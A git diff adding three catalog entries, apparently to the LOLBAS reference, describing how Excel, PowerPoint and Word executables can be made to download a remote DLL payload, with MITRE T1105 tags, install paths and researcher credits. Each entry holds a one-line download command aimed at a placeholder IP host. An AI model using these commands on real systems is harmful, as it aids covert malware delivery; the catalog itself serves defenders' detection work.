diff --git a/yml/OtherMSBinaries/Excel.yml b/yml/OtherMSBinaries/Excel.yml new file mode 100644 index 0000000..c61df04 --- /dev/null +++ b/yml/OtherMSBinaries/Excel.yml @@ -0,0 +1,37 @@ +--- +Name: Excel.exe +Description: Microsoft Office binary. +Author: 'Reegun J (OCBC Bank)' +Created: '2019-07-19' +Commands: + - Command: Excel.exe "http://192.168.1.10/TeamsAddinLoader.dll" + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in the cache folder + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe + - Path: C:\Program Files\Microsoft Office\Office16\Excel.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe + - Path: C:\Program Files\Microsoft Office\Office15\Excel.exe + - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe + - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe + - Path: C:\Program Files\Microsoft Office\Office14\Excel.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe + - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe + - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe +Resources: + - Link: https://twitter.com/reegun21/status/1150032506504151040 + - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 +Acknowledgement: + - Person: Reegun J (OCBC Bank) + Handle: '@reegun21' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Powerpnt.yml b/yml/OtherMSBinaries/Powerpnt.yml new file mode 100644 index 0000000..ea1151a --- /dev/null +++ b/yml/OtherMSBinaries/Powerpnt.yml @@ -0,0 +1,37 @@ +--- +Name: Powerpnt.exe +Description: Microsoft Office binary. +Author: 'Reegun J (OCBC Bank)' +Created: '2019-07-19' +Commands: + - Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll" + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in the cache folder + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe + - Path: C:\Program Files\Microsoft Office\Office16\Powerpnt.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe + - Path: C:\Program Files\Microsoft Office\Office15\Powerpnt.exe + - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe + - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe + - Path: C:\Program Files\Microsoft Office\Office14\Powerpnt.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe + - Path: C:\Program Files\Microsoft Office\Office12\Powerpnt.exe + - Path: C:\Program Files\Microsoft Office\Office12\Powerpnt.exe +Resources: + - Link: https://twitter.com/reegun21/status/1150032506504151040 + - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 +Acknowledgement: + - Person: Reegun J (OCBC Bank) + Handle: '@reegun21' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml new file mode 100644 index 0000000..3b3e6fb --- /dev/null +++ b/yml/OtherMSBinaries/Winword.yml @@ -0,0 +1,37 @@ +--- +Name: Winword.exe +Description: Microsoft Office binary. +Author: 'Reegun J (OCBC Bank)' +Created: '2019-07-19' +Commands: + - Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll" + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in the cache folder + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe + - Path: C:\Program Files\Microsoft Office\Office16\winword.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\winword.exe + - Path: C:\Program Files\Microsoft Office\Office15\winword.exe + - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe + - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office14\winword.exe + - Path: C:\Program Files\Microsoft Office\Office14\winword.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe + - Path: C:\Program Files\Microsoft Office\Office12\winword.exe + - Path: C:\Program Files\Microsoft Office\Office12\winword.exe +Resources: + - Link: https://twitter.com/reegun21/status/1150032506504151040 + - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 +Acknowledgement: + - Person: Reegun J (OCBC Bank) + Handle: '@reegun21' +--- \ No newline at end of file